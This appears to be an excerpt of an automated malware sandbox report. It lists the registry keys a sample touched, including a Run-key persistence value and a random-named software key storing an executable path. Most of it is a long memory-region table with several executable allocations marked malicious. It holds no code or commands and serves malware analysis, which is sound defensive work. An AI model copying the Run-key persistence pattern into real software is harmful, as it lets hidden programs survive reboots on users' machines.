HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER\Underlaying
Ambisporangiate
HKEY_CURRENT_USER\Environment
Voiceless
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
exepath
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
licence
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Straddlers
There are 12 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
59E4000
trusted library allocation
page read and write
malicious
8570000
direct allocation
page execute and read and write
malicious
7337000
heap
page read and write
malicious
8E66000
direct allocation
page execute and read and write
malicious
5919000
trusted library allocation
page read and write
malicious
4A8E000
stack
page read and write
466F000
heap
page read and write
6345000
heap
page read and write
28E0000
heap
page read and write
88B0000
trusted library allocation
page read and write
4B86000
heap
page read and write
2BD8000
heap
page read and write
4651000
heap
page read and write
80A0000
trusted library allocation
page read and write
6D4000
heap
page read and write
21BB3D24000
trusted library allocation
page read and write
6CA0000
direct allocation
page read and write
6336000
heap
page read and write
7134000
heap
page read and write
2BB2000
heap
page read and write
2D78000
heap
page read and write
21BAF201000
trusted library allocation
page read and write
2C22000
heap
page read and write
2B92000
heap
page read and write
2DCB000
heap
page read and write
6D0000
heap
page read and write
4653000
heap
page read and write
6D4000
heap
page read and write
21BAE913000
heap
page read and write
21BB3EFA000
heap
page read and write
21BAE890000
heap
page read and write
6CD0000
direct allocation
page read and write
2C26000
heap
page read and write
74B0000
trusted library allocation
page execute and read and write
2D50000
heap
page readonly
73F5000
heap
page read and write
6D4000
heap
page read and write
468B000
heap
page read and write
30BF000
stack
page read and write
7373000
heap
page read and write
4631000
heap
page read and write
2C09000
trusted library allocation
page read and write
4950000
trusted library allocation
page read and write
4B3C000
heap
page read and write
2DF8000
heap
page read and write
633B000
heap
page read and write
6C70000
direct allocation
page read and write
7F67000
stack
page read and write
2C8E000
stack
page read and write
633B000
heap
page read and write
2C50000
heap
page read and write
57D5000
trusted library allocation
page read and write
29F8000
heap
page read and write
22A9E000
stack
page read and write
6D5000
heap
page read and write
76C000
stack
page read and write
6C0000
direct allocation
page read and write
6D5000
heap
page read and write
21BAF102000
heap
page read and write
82E9000
heap
page read and write
4651000
heap
page read and write
21BB3EC8000
heap
page read and write
850E000
stack
page read and write
670000
direct allocation
page read and write
4D6DBFE000
stack
page read and write
22DA9000
heap
page read and write
2E7E000
stack
page read and write
465E000
stack
page read and write
2BD8000
heap
page read and write
86F4000
heap
page read and write
753E000
stack
page read and write
2D80000
heap
page read and write
2847000
stack
page read and write
6D4000
heap
page read and write
2FEF000
stack
page read and write
86F1000
heap
page read and write
4F7F000
stack
page read and write
469E000
heap
page read and write
4647000
heap
page read and write
31C8000
heap
page read and write
7389000
heap
page read and write
2D3A000
heap
page read and write
23040000
heap
page read and write
8040000
heap
page read and write
73BE000
heap
page read and write
21BB3C50000
trusted library allocation
page read and write
3230000
heap
page read and write
735B000
heap
page read and write
6312000
heap
page read and write
4640000
heap
page read and write
29E6000
heap
page read and write
22BEC000
stack
page read and write
2C07000
heap
page read and write
2BE7000
heap
page read and write
2D68000
trusted library allocation
page read and write
6342000
heap
page read and write
2D20000
trusted library allocation
page read and write
400000
system
page execute and read and write
21BAF100000
heap
page read and write
74C0000
trusted library allocation
page read and write
6D4000
heap
page read and write
5E9E000
stack
page read and write
7363000
heap
page read and write
2BFC000
heap
page read and write
7393000
heap
page read and write
7630000
trusted library allocation
page read and write
21BB3CE0000
trusted library allocation
page read and write
4645000
heap
page read and write
8DCC000
heap
page read and write
21BAF7A0000
trusted library allocation
page read and write
21BB3E56000
heap
page read and write
2AD0000
heap
page read and write
2F20000
heap
page read and write
2314A000
heap
page read and write
82F5000
heap
page read and write
21BB3E30000
trusted library allocation
page read and write
2A10000
heap
page read and write
7520000
trusted library allocation
page read and write
6D4000
heap
page read and write
29B0000
trusted library section
page read and write
B666000
direct allocation
page execute and read and write
2C00000
heap
page read and write
3000000
heap
page read and write
3120000
heap
page read and write
2954000
heap
page read and write
2CE8000
trusted library allocation
page read and write
734C000
heap
page read and write
6D4000
heap
page read and write
2CD0000
heap
page readonly
6D4000
heap
page read and write
4647000
heap
page read and write
2954000
heap
page read and write
4631000
heap
page read and write
7375000
heap
page read and write
8DD3000
heap
page read and write
6336000
heap
page read and write
6342000
heap
page read and write
21BAE82B000
heap
page read and write
2D10000
trusted library allocation
page read and write
8707000
heap
page read and write
2C07000
heap
page read and write
2BEB000
heap
page read and write
2C4F000
heap
page read and write
227B0000
direct allocation
page read and write
4B31000
heap
page read and write
7377000
heap
page read and write
2D3F000
stack
page read and write
4981000
trusted library allocation
page read and write
8DBD000
heap
page read and write
21BB3EEE000
heap
page read and write
4664000
heap
page read and write
760000
heap
page read and write
4645000
heap
page read and write
6F0000
direct allocation
page read and write
2D13000
heap
page read and write
2BBE000
heap
page read and write
21BB3F11000
heap
page read and write
632D000
heap
page read and write
4631000
heap
page read and write
73A9000
heap
page read and write
7600000
trusted library allocation
page read and write
4E50000
trusted library allocation
page read and write
7363000
heap
page read and write
4FD1000
heap
page read and write
469E000
heap
page read and write
2890000
heap
page read and write
4B31000
heap
page read and write
4631000
heap
page read and write
18D000
stack
page read and write
29E0000
trusted library allocation
page read and write
633E000
heap
page read and write
4D6D47E000
unkown
page readonly
7F600000
trusted library allocation
page execute and read and write
7620000
trusted library allocation
page read and write
21BAE840000
heap
page read and write
2DD0000
heap
page read and write
2C12000
heap
page read and write
2D00000
trusted library allocation
page read and write
2F2C000
heap
page read and write
2CF4000
trusted library allocation
page read and write
4D6DE7E000
unkown
page readonly
459000
system
page execute and read and write
464E000
heap
page read and write
4986000
trusted library allocation
page read and write
4655000
heap
page read and write
2C08000
heap
page read and write
2BEB000
heap
page read and write
2954000
heap
page read and write
633C000
heap
page read and write
29E3000
trusted library allocation
page execute and read and write
21BB4030000
trusted library allocation
page read and write
47D8000
heap
page read and write
634D000
heap
page read and write
6D4000
heap
page read and write
2C05000
heap
page read and write
456000
system
page execute and read and write
4D6D87E000
unkown
page readonly
73DE000
stack
page read and write
4D6C19B000
stack
page read and write
8CF0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
4C11000
heap
page read and write
21BB3F00000
heap
page read and write
2DEE000
heap
page read and write
4880000
heap
page execute and read and write
67F000
stack
page read and write
400000
system
page execute and read and write
2AFD000
stack
page read and write
227A0000
direct allocation
page read and write
316F000
stack
page read and write
2A9E000
stack
page read and write
2BE3000
heap
page read and write
8676000
heap
page read and write
4D5A000
trusted library allocation
page read and write
4651000
heap
page read and write
4FE0000
heap
page read and write
5799000
trusted library allocation
page read and write
2C02000
heap
page read and write
4645000
heap
page read and write
4653000
heap
page read and write
7F90000
trusted library allocation
page read and write
4647000
heap
page read and write
4670000
heap
page read and write
29F0000
heap
page read and write
8DDB000
heap
page read and write
4651000
heap
page read and write
6328000
heap
page read and write
7540000
heap
page read and write
867D000
heap
page read and write
4631000
heap
page read and write
23440000
unclassified section
page execute and read and write
2C0E000
heap
page read and write
870D000
heap
page read and write
2D88000
heap
page read and write
2C12000
heap
page read and write
6C80000
direct allocation
page read and write
2C5E000
heap
page read and write
2C10000
trusted library allocation
page read and write
80B0000
trusted library allocation
page read and write
2B40000
heap
page read and write
6D4000
heap
page read and write
2D1A000
trusted library allocation
page execute and read and write
86A7000
heap
page read and write
4659000
heap
page read and write
7590000
trusted library allocation
page read and write
64C000
stack
page read and write
4ADB000
trusted library allocation
page read and write
2C5B000
heap
page read and write
854C000
stack
page read and write
4F80000
trusted library allocation
page read and write
4630000
heap
page read and write
21BAE902000
heap
page read and write
306E000
stack
page read and write
21BB3F0A000
heap
page read and write
7320000
trusted library allocation
page read and write
8530000
trusted library allocation
page read and write
22B1E000
stack
page read and write
2BFC000
heap
page read and write
2C3E000
stack
page read and write
4D6CF7E000
unkown
page readonly
4644000
heap
page read and write
632F000
heap
page read and write
2BB2000
heap
page read and write
632F000
heap
page read and write
72D8000
heap
page read and write
75E000
stack
page read and write
2C22000
heap
page read and write
7680000
trusted library allocation
page read and write
4760000
heap
page execute and read and write
2C10000
heap
page read and write
2BB4000
heap
page read and write
2954000
heap
page read and write
633B000
heap
page read and write
2EBC000
stack
page read and write
6CB0000
direct allocation
page read and write
21BAF291000
trusted library allocation
page read and write
47D1000
trusted library allocation
page read and write
4FD1000
heap
page read and write
4970000
heap
page read and write
6342000
heap
page read and write
62F0000
heap
page read and write
4B31000
heap
page read and write
7570000
trusted library allocation
page read and write
2C11000
heap
page read and write
296F000
stack
page read and write
737B000
heap
page read and write
463C000
heap
page read and write
2954000
heap
page read and write
22F32000
heap
page read and write
7690000
trusted library allocation
page read and write
8660000
trusted library allocation
page execute and read and write
867B000
heap
page read and write
2AA0000
heap
page read and write
21BAFC50000
trusted library allocation
page read and write
2C22000
heap
page read and write
6334000
heap
page read and write
2C8D000
stack
page read and write
687000
stack
page read and write
6D4000
heap
page read and write
7330000
trusted library allocation
page read and write
8DBD000
heap
page read and write
31C0000
heap
page read and write
2DC3000
heap
page read and write
21BAE822000
heap
page read and write
8DD3000
heap
page read and write
6333000
heap
page read and write
4677000
heap
page read and write
90E7000
trusted library allocation
page read and write
2C05000
heap
page read and write
720000
direct allocation
page read and write
4B31000
heap
page read and write
86AF000
heap
page read and write
86A4000
heap
page read and write
2D60000
heap
page read and write
2C0E000
heap
page read and write
28E0000
heap
page read and write
699000
stack
page read and write
4D6C87E000
unkown
page readonly
4B8F000
heap
page read and write
4B31000
heap
page read and write
2BBE000
heap
page read and write
6D8E000
stack
page read and write
2C26000
heap
page read and write
7204000
heap
page read and write
6336000
heap
page read and write
7530000
trusted library allocation
page read and write
6D5000
heap
page read and write
29E0000
heap
page read and write
464E000
heap
page read and write
2BA5000
heap
page read and write
2D9F000
heap
page read and write
4EE6000
trusted library allocation
page read and write
2BC4000
heap
page read and write
21BAEA00000
heap
page read and write
86A7000
heap
page read and write
4655000
heap
page read and write
2E2E000
stack
page read and write
2C05000
heap
page read and write
869D000
heap
page read and write
690000
direct allocation
page read and write
4B31000
heap
page read and write
2C26000
heap
page read and write
21BB3D20000
trusted library allocation
page read and write
4F0D000
trusted library allocation
page read and write
466F000
heap
page read and write
2CCF000
stack
page read and write
4647000
heap
page read and write
2ADB000
heap
page read and write
749D000
stack
page read and write
2C08000
heap
page read and write
21BAF113000
heap
page read and write
4D6D6FE000
stack
page read and write
2C5D000
heap
page read and write
4B84000
heap
page read and write
4659000
heap
page read and write
8080000
heap
page read and write
8550000
trusted library allocation
page read and write
6364000
heap
page read and write
2284F000
stack
page read and write
2BF7000
heap
page read and write
463C000
heap
page read and write
21BAF000000
heap
page read and write
8DCC000
heap
page read and write
463C000
heap
page read and write
8080000
heap
page read and write
2F30000
heap
page read and write
8BC0000
trusted library allocation
page read and write
4B31000
heap
page read and write
4FE0000
heap
page read and write
4640000
heap
page read and write
863F000
heap
page read and write
2954000
heap
page read and write
22E40000
heap
page read and write
3AC0000
remote allocation
page execute and read and write
54E0000
heap
page read and write
4ACE000
stack
page read and write
4639000
heap
page read and write
2D85000
heap
page read and write
86F8000
heap
page read and write
4630000
heap
page read and write
4F81000
heap
page read and write
88A0000
trusted library allocation
page read and write
6336000
heap
page read and write
8DC1000
heap
page read and write
2C05000
heap
page read and write
4676000
heap
page read and write
4D6D8FE000
stack
page read and write
2C22000
heap
page read and write
4ED4000
heap
page read and write
320F000
stack
page read and write
7640000
trusted library allocation
page read and write
4631000
heap
page read and write
82D5000
heap
page read and write
560000
heap
page read and write
31F0000
heap
page read and write
22A1F000
stack
page read and write
29AE000
stack
page read and write
2950000
heap
page read and write
228DF000
stack
page read and write
86AF000
heap
page read and write
8200000
heap
page read and write
7450000
trusted library allocation
page read and write
2DB8000
heap
page read and write
21BAF015000
heap
page read and write
4B31000
heap
page read and write
4B31000
heap
page read and write
4651000
heap
page read and write
463C000
heap
page read and write
86F8000
heap
page read and write
6F60000
heap
page read and write
2BC5000
heap
page read and write
4FB1000
heap
page read and write
2C22000
trusted library allocation
page read and write
469E000
heap
page read and write
4640000
heap
page read and write
29EC000
heap
page read and write
4677000
heap
page read and write
2C07000
heap
page read and write
2C46000
heap
page read and write
745E000
stack
page read and write
700000
direct allocation
page read and write
598B000
trusted library allocation
page read and write
4B9F000
remote allocation
page execute and read and write
2C07000
heap
page read and write
4B31000
heap
page read and write
86F8000
heap
page read and write
8707000
heap
page read and write
21BB4020000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2C26000
heap
page read and write
4D70000
trusted library allocation
page read and write
2BBE000
heap
page read and write
6327000
heap
page read and write
2C12000
heap
page read and write
4FD4000
trusted library allocation
page read and write
296E000
stack
page read and write
803E000
stack
page read and write
7500000
trusted library allocation
page read and write
4631000
heap
page read and write
2954000
heap
page read and write
21BB4040000
trusted library allocation
page read and write
2BEE000
heap
page read and write
8651000
heap
page read and write
8709000
heap
page read and write
21BB3CE1000
trusted library allocation
page read and write
4B31000
heap
page read and write
6D4000
heap
page read and write
2CA0000
heap
page read and write
2D60000
trusted library allocation
page read and write
5660000
trusted library allocation
page read and write
6340000
heap
page read and write
4645000
heap
page read and write
75E0000
trusted library allocation
page read and write
4676000
heap
page read and write
7340000
trusted library allocation
page read and write
6D4000
heap
page read and write
565000
heap
page read and write
2C30000
heap
page read and write
82A0000
trusted library allocation
page execute and read and write
2C50000
heap
page read and write
852D000
stack
page read and write
2C00000
heap
page read and write
633B000
heap
page read and write
4D6D3FE000
stack
page read and write
75F0000
trusted library allocation
page read and write
831A000
heap
page read and write
29EB000
heap
page read and write
21BB3E8C000
heap
page read and write
4D6CC7B000
stack
page read and write
46F1000
heap
page read and write
21BAE878000
heap
page read and write
4D6D5FE000
stack
page read and write
4F0F000
trusted library allocation
page read and write
2970000
trusted library allocation
page read and write
466E000
heap
page read and write
8F6B000
stack
page read and write
22E21000
heap
page read and write
2BF7000
heap
page read and write
4631000
heap
page read and write
21BB3ED3000
heap
page read and write
4B31000
heap
page read and write
21BB4010000
trusted library allocation
page read and write
529B000
stack
page read and write
21BB3E44000
heap
page read and write
4649000
heap
page read and write
4649000
heap
page read and write
2C26000
heap
page read and write
2BFC000
heap
page read and write
23499000
unclassified section
page execute and read and write
2BF2000
heap
page read and write
2954000
heap
page read and write
29ED000
trusted library allocation
page execute and read and write
2C08000
heap
page read and write
C066000
direct allocation
page execute and read and write
2C11000
heap
page read and write
2C12000
heap
page read and write
2D00000
trusted library allocation
page execute and read and write
400000
system
page execute and read and write
2DA0000
trusted library allocation
page read and write
2C11000
heap
page read and write
741E000
stack
page read and write
29EB000
heap
page read and write
21BB3C60000
trusted library allocation
page read and write
2A7D000
stack
page read and write
21BB3DB0000
trusted library allocation
page read and write
2C00000
heap
page read and write
4630000
heap
page read and write
82B0000
heap
page read and write
4D6CD7E000
unkown
page readonly
6D90000
direct allocation
page read and write
21BB3CE2000
trusted library allocation
page read and write
4672000
heap
page read and write
86F1000
heap
page read and write
2C07000
heap
page read and write
21BAF8A0000
trusted library section
page readonly
6DA0000
direct allocation
page read and write
2BF2000
heap
page read and write
4D6D7FE000
stack
page read and write
2C4F000
heap
page read and write
4B31000
heap
page read and write
710000
direct allocation
page read and write
23119000
heap
page read and write
2C52000
heap
page read and write
8D52000
heap
page read and write
2C7E000
stack
page read and write
829C000
stack
page read and write
2A5D000
stack
page read and write
22C60000
unclassified section
page execute and read and write
2954000
heap
page read and write
4C95000
trusted library allocation
page read and write
7470000
trusted library allocation
page read and write
73E0000
heap
page read and write
2DCA000
heap
page read and write
22F32000
heap
page read and write
6342000
heap
page read and write
8677000
heap
page read and write
8170000
trusted library allocation
page execute and read and write
723E000
stack
page read and write
469E000
heap
page read and write
4640000
heap
page read and write
227C0000
direct allocation
page read and write
2289E000
stack
page read and write
6D5000
heap
page read and write
4B10000
heap
page read and write
21BB3D20000
trusted library allocation
page read and write
6B6E000
stack
page read and write
84CE000
stack
page read and write
8676000
heap
page read and write
4B50000
heap
page read and write
2CC0000
heap
page read and write
4655000
heap
page read and write
2BA8000
heap
page read and write
64C000
stack
page read and write
539E000
stack
page read and write
2BD5000
heap
page read and write
4648000
heap
page read and write
4689000
heap
page read and write
22C91000
direct allocation
page execute and read and write
2C56000
heap
page read and write
21BB3E40000
trusted library allocation
page read and write
2C00000
heap
page read and write
63D000
stack
page read and write
8707000
heap
page read and write
2DCE000
stack
page read and write
4651000
heap
page read and write
6B0000
direct allocation
page read and write
3440000
heap
page read and write
6327000
heap
page read and write
2C22000
heap
page read and write
4B31000
heap
page read and write
2C40000
heap
page read and write
2DC8000
heap
page read and write
86AF000
heap
page read and write
2F54000
heap
page read and write
82B4000
heap
page read and write
2C54000
heap
page read and write
2D30000
heap
page read and write
6BE0000
heap
page execute and read and write
6B2E000
stack
page read and write
2DC0000
heap
page read and write
2BF5000
heap
page read and write
6D5000
heap
page read and write
4651000
heap
page read and write
2CF8000
heap
page read and write
29EE000
heap
page read and write
2B7D000
stack
page read and write
33FF000
stack
page read and write
4B31000
heap
page read and write
6F70000
heap
page read and write
74A0000
trusted library allocation
page read and write
2311A000
heap
page read and write
21BAF002000
heap
page read and write
21BAF11A000
heap
page read and write
48CE000
stack
page read and write
28E8000
heap
page read and write
22C90000
direct allocation
page read and write
4651000
heap
page read and write
4677000
heap
page read and write
2C05000
heap
page read and write
6327000
heap
page read and write
2BD8000
heap
page read and write
4646000
heap
page read and write
229DE000
stack
page read and write
7580000
trusted library allocation
page read and write
2C38000
heap
page read and write
74F0000
trusted library allocation
page read and write
464B000
heap
page read and write
1CE000
stack
page read and write
6374000
heap
page read and write
4EEF000
trusted library allocation
page read and write
4B0E000
stack
page read and write
4653000
heap
page read and write
327E000
stack
page read and write
71FE000
stack
page read and write
790000
heap
page read and write
73CB000
heap
page read and write
230B9000
heap
page read and write
8090000
trusted library allocation
page execute and read and write
4D6C777000
stack
page read and write
4D6DD7D000
stack
page read and write
4645000
heap
page read and write
2BB2000
heap
page read and write
4B31000
heap
page read and write
8707000
heap
page read and write
2C3E000
heap
page read and write
2D8E000
heap
page read and write
2295C000
stack
page read and write
86F8000
heap
page read and write
21BAE85C000
heap
page read and write
23516000
unclassified section
page execute and read and write
2C0E000
heap
page read and write
4631000
heap
page read and write
4639000
heap
page read and write
4677000
heap
page read and write
2BBE000
heap
page read and write
2349D000
unclassified section
page execute and read and write
2C12000
heap
page read and write
6F60000
heap
page read and write
2C5D000
heap
page read and write
4672000
heap
page read and write
2D80000
heap
page read and write
2E8C000
stack
page read and write
7F960000
trusted library allocation
page execute and read and write
730000
heap
page read and write
21BB3C90000
trusted library allocation
page read and write
4D6DC7E000
unkown
page readonly
4B31000
heap
page read and write
559F000
remote allocation
page execute and read and write
2BA6000
heap
page read and write
21BB3E5C000
heap
page read and write
463C000
heap
page read and write
2C4F000
heap
page read and write
8678000
heap
page read and write
21BB3D10000
trusted library allocation
page read and write
828E000
stack
page read and write
2C08000
heap
page read and write
46EE000
stack
page read and write
4C10000
heap
page read and write
68C000
stack
page read and write
2EFD000
stack
page read and write
8636000
heap
page read and write
29E9000
heap
page read and write
4675000
heap
page read and write
3010000
heap
page read and write
2C40000
heap
page read and write
463C000
heap
page read and write
2CF0000
heap
page read and write
7373000
heap
page read and write
4680000
heap
page read and write
4F80000
trusted library allocation
page read and write
31FA000
heap
page read and write
8600000
trusted library allocation
page read and write
2A2F000
unkown
page read and write
463C000
heap
page read and write
2AB0000
heap
page read and write
2C57000
heap
page read and write
8540000
trusted library allocation
page read and write
650000
direct allocation
page read and write
4653000
heap
page read and write
2D40000
trusted library allocation
page read and write
8610000
heap
page read and write
6D4000
heap
page read and write
22570000
heap
page read and write
7347000
trusted library allocation
page read and write
8050000
trusted library allocation
page execute and read and write
84EE000
stack
page read and write
4B30000
heap
page read and write
2C2B000
heap
page read and write
8D50000
heap
page read and write
21BAF10C000
heap
page read and write
4651000
heap
page read and write
29EE000
stack
page read and write
5981000
trusted library allocation
page read and write
7107000
trusted library allocation
page read and write
2DF4000
heap
page read and write
21BAF11B000
heap
page read and write
463C000
heap
page read and write
4649000
heap
page read and write
21BB3CE4000
trusted library allocation
page read and write
7381000
heap
page read and write
21BAF8D0000
trusted library section
page readonly
81D0000
trusted library allocation
page read and write
4B31000
heap
page read and write
86F8000
heap
page read and write
48CB000
trusted library allocation
page read and write
4ED0000
heap
page read and write
2C11000
heap
page read and write
80C0000
trusted library allocation
page read and write
230B9000
heap
page read and write
21BAF890000
trusted library section
page readonly
74FE000
stack
page read and write
8D53000
heap
page read and write
21BB3E60000
heap
page read and write
4F80000
trusted library allocation
page read and write
4B60000
heap
page read and write
29EA000
heap
page read and write
640000
heap
page readonly
7F70000
trusted library allocation
page execute and read and write
2280E000
stack
page read and write
7340000
heap
page read and write
7460000
trusted library allocation
page read and write
2BFC000
heap
page read and write
2C25000
trusted library allocation
page execute and read and write
6345000
heap
page read and write
3170000
heap
page read and write
B250000
heap
page read and write
4B31000
heap
page read and write
464A000
heap
page read and write
21BAE88C000
heap
page read and write
2C13000
heap
page read and write
29AE000
stack
page read and write
22D31000
heap
page read and write
73C4000
heap
page read and write
8DD7000
heap
page read and write
2C40000
trusted library allocation
page read and write
6300000
heap
page read and write
8675000
heap
page read and write
2D50000
heap
page read and write
21BB3F02000
heap
page read and write
4631000
heap
page read and write
4F80000
trusted library allocation
page read and write
22DAA000
heap
page read and write
790000
heap
page read and write
22CA6000
direct allocation
page execute and read and write
4FB1000
heap
page read and write
2DE0000
heap
page read and write
4D6CE79000
stack
page read and write
86A7000
heap
page read and write
2D15000
heap
page read and write
21BAE8B0000
heap
page read and write
224AD000
stack
page read and write
4F80000
heap
page read and write
21BAE8FF000
heap
page read and write
21BB3CC0000
trusted library allocation
page read and write
22C2E000
stack
page read and write
2C4F000
heap
page read and write
2C00000
heap
page read and write
7373000
heap
page read and write
6CFE000
stack
page read and write
2BBE000
heap
page read and write
4E7F000
stack
page read and write
4B31000
heap
page read and write
2BFE000
heap
page read and write
8672000
heap
page read and write
AC66000
direct allocation
page execute and read and write
464D000
heap
page read and write
2F57000
heap
page read and write
464E000
heap
page read and write
4F80000
trusted library allocation
page read and write
2BA8000
heap
page read and write
815E000
stack
page read and write
7185000
heap
page read and write
6332000
heap
page read and write
700000
heap
page read and write
6342000
heap
page read and write
8708000
heap
page read and write
2BB4000
heap
page read and write
8620000
direct allocation
page read and write
8560000
trusted library allocation
page read and write
21BAE87C000
heap
page read and write
2BE6000
heap
page read and write
49E0000
trusted library allocation
page read and write
53DE000
stack
page read and write
4771000
trusted library allocation
page read and write
2BD8000
heap
page read and write
4D6DA7D000
stack
page read and write
74B5000
trusted library allocation
page read and write
2B92000
heap
page read and write
713F000
heap
page read and write
632C000
heap
page read and write
226DE000
stack
page read and write
21BB3CE0000
trusted library allocation
page read and write
8610000
direct allocation
page read and write
2BFC000
heap
page read and write
4677000
heap
page read and write
6337000
heap
page read and write
6C9000
stack
page read and write
45C000
system
page execute and read and write
8070000
trusted library allocation
page read and write
8D8B000
heap
page read and write
4D6E67E000
unkown
page readonly
4870000
heap
page execute and read and write
21BB3EC6000
heap
page read and write
75DB000
stack
page read and write
7231000
heap
page read and write
633E000
heap
page read and write
75BD000
stack
page read and write
2C30000
heap
page read and write
76D000
stack
page read and write
66B000
stack
page read and write
4B70000
heap
page read and write
757E000
stack
page read and write
2C23000
heap
page read and write
634C000
heap
page read and write
5771000
trusted library allocation
page read and write
4638000
heap
page read and write
21BAE873000
heap
page read and write
7439000
heap
page read and write
4D6D77E000
unkown
page readonly
3040000
heap
page read and write
4D6E5FE000
stack
page read and write
82E4000
heap
page read and write
880F000
stack
page read and write
4630000
heap
page read and write
632A000
heap
page read and write
2BED000
heap
page read and write
6332000
heap
page read and write
4610000
heap
page read and write
5914000
trusted library allocation
page read and write
2954000
heap
page read and write
72F8000
heap
page read and write
21BAE828000
heap
page read and write
22DA9000
heap
page read and write
2BFC000
heap
page read and write
2D11000
heap
page read and write
463C000
heap
page read and write
70DF000
stack
page read and write
7373000
heap
page read and write
21BB3E00000
heap
page read and write
7550000
trusted library allocation
page read and write
21BB3E30000
heap
page read and write
6D4000
heap
page read and write
4A55000
heap
page read and write
21BAF8B0000
trusted library section
page readonly
4B31000
heap
page read and write
484E000
stack
page read and write
21BAE700000
heap
page read and write
23041000
heap
page read and write
2C2E000
unkown
page read and write
2BE2000
heap
page read and write
2B60000
heap
page read and write
2C02000
heap
page read and write
2C02000
heap
page read and write
54DE000
stack
page read and write
2CFD000
trusted library allocation
page execute and read and write
2954000
heap
page read and write
6CE0000
direct allocation
page read and write
2BF7000
heap
page read and write
4651000
heap
page read and write
2C20000
trusted library allocation
page read and write
2351C000
unclassified section
page execute and read and write
6D4000
heap
page read and write
6D4000
heap
page read and write
811E000
stack
page read and write
2E0E000
stack
page read and write
5F9F000
remote allocation
page execute and read and write
4647000
heap
page read and write
667000
heap
page read and write
8890000
trusted library allocation
page read and write
75D0000
trusted library allocation
page execute and read and write
6CC0000
direct allocation
page read and write
21BAF540000
trusted library allocation
page read and write
2C07000
heap
page read and write
2CFF000
stack
page read and write
633B000
heap
page read and write
8707000
heap
page read and write
700000
heap
page read and write
21BAE8A2000
heap
page read and write
6D5000
heap
page read and write
21BB3DC0000
trusted library allocation
page read and write
2954000
heap
page read and write
7440000
trusted library allocation
page read and write
4631000
heap
page read and write
4631000
heap
page read and write
3BF6000
remote allocation
page execute and read and write
8688000
heap
page read and write
7395000
trusted library allocation
page read and write
8674000
heap
page read and write
4F02000
trusted library allocation
page read and write
710000
heap
page readonly
78F000
stack
page read and write
5F9F000
stack
page read and write
7146000
heap
page read and write
747A000
trusted library allocation
page read and write
2C0E000
heap
page read and write
2F61000
heap
page read and write
8DFF000
heap
page read and write
2C22000
heap
page read and write
2D09000
trusted library allocation
page read and write
4647000
heap
page read and write
6D4000
heap
page read and write
682000
stack
page read and write
4D6E07E000
unkown
page readonly
2D90000
trusted library allocation
page execute and read and write
8D30000
direct allocation
page execute and read and write
6D4000
heap
page read and write
6D80000
direct allocation
page read and write
790000
heap
page read and write
632F000
heap
page read and write
22A5B000
stack
page read and write
4643000
heap
page read and write
6331000
heap
page read and write
5900000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
633B000
heap
page read and write
6395000
heap
page read and write
4647000
heap
page read and write
21BAFC21000
trusted library allocation
page read and write
299E000
stack
page read and write
8DC8000
heap
page read and write
2C05000
heap
page read and write
6C90000
direct allocation
page read and write
4631000
heap
page read and write
743E000
heap
page read and write
72D0000
heap
page read and write
230EA000
heap
page read and write
2B30000
heap
page read and write
4F80000
trusted library allocation
page read and write
4651000
heap
page read and write
7F80000
trusted library allocation
page read and write
2C22000
heap
page read and write
8060000
trusted library allocation
page read and write
8DD6000
heap
page read and write
6DCF000
stack
page read and write
2B00000
trusted library allocation
page read and write
4677000
heap
page read and write
29EA000
heap
page read and write
2C22000
heap
page read and write
2C26000
heap
page read and write
4631000
heap
page read and write
2D70000
heap
page read and write
4639000
heap
page read and write
4B31000
heap
page read and write
4B31000
heap
page read and write
8DBD000
heap
page read and write
2C0E000
heap
page read and write
7510000
trusted library allocation
page read and write
2B10000
trusted library allocation
page read and write
2ECB000
stack
page read and write
4CAF000
trusted library allocation
page read and write
4D6D67E000
unkown
page readonly
2954000
heap
page read and write
2BFC000
heap
page read and write
6334000
heap
page read and write
2C44000
heap
page read and write
86AF000
heap
page read and write
4EE2000
trusted library allocation
page read and write
2C05000
heap
page read and write
46F1000
heap
page read and write
21BB3D10000
trusted library allocation
page read and write
906D000
stack
page read and write
2F2E000
stack
page read and write
6312000
heap
page read and write
2D20000
trusted library allocation
page read and write
73D1000
heap
page read and write
27A7000
stack
page read and write
6AEE000
stack
page read and write
8D5A000
heap
page read and write
4D6D07C000
stack
page read and write
2C1F000
heap
page read and write
21BAEFA0000
trusted library section
page read and write
2DB4000
heap
page read and write
2954000
heap
page read and write
740000
direct allocation
page read and write
2C0E000
heap
page read and write
419F000
remote allocation
page execute and read and write
2BF2000
heap
page read and write
8DBD000
heap
page read and write
825E000
stack
page read and write
472E000
stack
page read and write
2BED000
heap
page read and write
71A8000
heap
page read and write
21BB3E63000
